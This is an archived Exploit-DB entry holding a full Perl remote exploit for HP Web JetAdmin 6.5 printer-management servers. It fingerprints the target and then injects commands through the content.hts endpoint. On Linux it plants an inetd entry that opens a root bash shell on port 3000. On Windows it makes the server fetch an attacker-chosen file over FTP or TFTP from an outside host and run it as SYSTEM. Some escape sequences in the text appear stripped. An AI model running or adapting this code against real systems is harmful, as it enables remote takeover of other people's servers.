https://www.exploit-db.com/exploits/294

漏洞细节尚未披露

#!/usr/bin/perl 
use IO::Socket;
#
# This is an exploit for HP Web JetAdmin, the printer management server from HP. 
# It is NOT about printers! The service usually runs on port 8000 on Windows, 
# Solaris or Linux boxes.
#
# Greetz: The Phenoelit People, c-base crew, EEyE (rock!), Halvar on the other
#         side of the planet, Johnny, Andreas, Lisa, H D Moore, Nicolas
#         Fishbach and all the others I forgot
#


$|=1;

die "Specify server name or IPn" unless ($host=shift);

#
# lala stuff 
# 
print "Phenoelit HP Web JetAdmin 6.5 remoten".
" Linux root and Windows NT/2000 Administrator exploitn".
" by FX of Phenoelitn".
" Research done at BlackHat Singapore 2002nn";

#
# Check version for the kiddies
# 
$request="GET /plugins/hpjwja/help/about.hts HTTP/1.0rnrn";
&doit();
#
# Get the path first
#
$rs=~/-- framework.ini (.+)-->/;
$hppath=$1;
if ($hppath) { $hppath=~s//doc/plugins/framework/framework.ini//; }
# 
# Now get some more info
#
$rs=~s/[rnt]//g;
$rs=~s/</td><td valign="top" nowrap>//g;
$rs=~/JetAdmin Version</b>([^<]+)</td>/;
$version=$1;
$rs=~/System Version</b>([^<]+)</td>/;
$system=$1;
die "It's not version 6.5 or version extraction failedn" unless ($version=~/6.5/);
die "Could not extract pathn" unless ($hppath);
#
# Info 2 user
#
print "HP Web JetAdmin Path: nt".$hppath."n";
print "HP Web JetAdmin Version: ".$version."n";

if ($system=~/Linux/) {
printf "Host system identified as Linux ...n";
#
# Create file content and kick off inetd
#
$cont= 
"obj=Httpd:VarCacheSet(hacked,true);".
    "Httpd:ExecuteFile(/usr/sbin/,inetd,".$hppath."/cache.ini)".
"&__BrowserID=0%0a3000%20stream%20tcp%20nowait%20root%20/bin/bash%20bash%0a";

$request = "POST /plugins/framework/script/content.hts HTTP/1.0rn".
"Host: ".$host."rn".
"Accept: text/html, text/plain, application/pdf, image/*, ".
"image/jpeg, text/sgml, video/mpeg, image/jpeg, ".
"image/tiff, image/x-rgb, image/png, image/x-xbitmap,".
" image/x-xbm, image/gif, application/postscript, */*;q=0.01rn".
"Accept-Language: enrn".
"Pragma: no-cachern".
"Cache-Control: no-cachern".
"User-Agent: Phenoelit scriptrn".
"Referer: http://www.phenoelit.de/rn".
"Content-type: application/x-www-form-urlencodedrn".
"Content-length: ".length($cont)."rnrn".
$cont;

&doit();
print "You should now connect to $host:3000 and enjoy your root shelln";

} elsif ($system=~/WinNT/) {

print "Target system is Windows.n".
" Do you want file upload via FTP [f] or TFTP [t]: ";
$usersel=<STDIN>;
if ($usersel=~/^f/i) {
print "FTP used ...n";
print "FTP Host: "; $ftph=<STDIN>; chomp($ftph);
print "FTP User: "; $ftpu=<STDIN>; chomp($ftpu);
print "FTP Pass: "; $ftpp=<STDIN>; chomp($ftpp);
print "FTP Path: "; $ftppath=<STDIN>; chomp($ftppath);
print "FTP File: "; $ftpfile=<STDIN>; chomp($ftpfile);

print "File ".$ftpfile." will be downloaded from ".$ftph.$ftppath."n".
" with username ".$ftpu." and password ".$ftpp."n";

$cont=
"obj=".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,open ".$ftph.",>c:\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,".$ftpu.">>c:\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,".$ftpp.">>c:\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,lcd c:\,>>c:\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,cd ".$ftppath.",>>c:\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,bin,>>c:\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,get ".$ftpfile.",>>c:\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,quit,>>c:\x.txt);".
"Httpd:ExecuteFile(,ftp.exe,-s:c:\x.txt);".
"Httpd:ExecuteFile(c:\,".$ftpfile.")";

} elsif ($usersel=~/^t/) {
print "TFTP used ...n";
print "TFTP Host: "; $ftph=<STDIN>; chomp($ftph);
print "TFTP Path: "; $ftppath=<STDIN>; chomp($ftppath);
print "TFTP File: "; $ftpfile=<STDIN>; chomp($ftpfile);

$ftppath.="/" unless ($ftppath=~//$/);
$cont=
"obj=".
"Httpd:ExecuteFile(,tftp.exe,-i,".$ftph.",GET,".
$ftppath.$ftpfile.",c:\".$ftpfile.");".
"Httpd:ExecuteFile(c:\,".$ftpfile.")";

} else {
print "Wurstfinger ?n";
exit 0;
}

$request = "POST /plugins/framework/script/content.hts HTTP/1.0rn".
"Host: ".$host."rn".
"Accept: text/html, text/plain, application/pdf, image/*, ".
"image/jpeg, text/sgml, video/mpeg, image/jpeg, ".
"image/tiff, image/x-rgb, image/png, image/x-xbitmap,".
" image/x-xbm, image/gif, application/postscript, */*;q=0.01rn".
"Accept-Language: enrn".
"Pragma: no-cachern".
"Cache-Control: no-cachern".
"User-Agent: Phenoelit scriptrn".
"Referer: http://www.phenoelit.de/rn".
"Content-type: application/x-www-form-urlencodedrn".
"Content-length: ".length($cont)."rnrn".
$cont;

print "If everything works well, the specified file should be runningn".
" soon in SYSTEM context. Don't stop this script until your programn".
" terminates. Enjoy the box.n";
&doit();

} else {
print "Host OS (".$system.") not supported by exploit - modify itn";
}

exit 0;


sub doit {
    $remote =
      IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort=>"8000",);
    die "cannot connect to http daemon on $hostn" unless($remote);
    $remote->autoflush(1);
    print $remote $request;

    $rs="";
    while ( $rline=<$remote> ) { 
$rs.=$rline;
#print $rline;
    }

    close $remote;
}

# milw0rm.com [2004-04-28]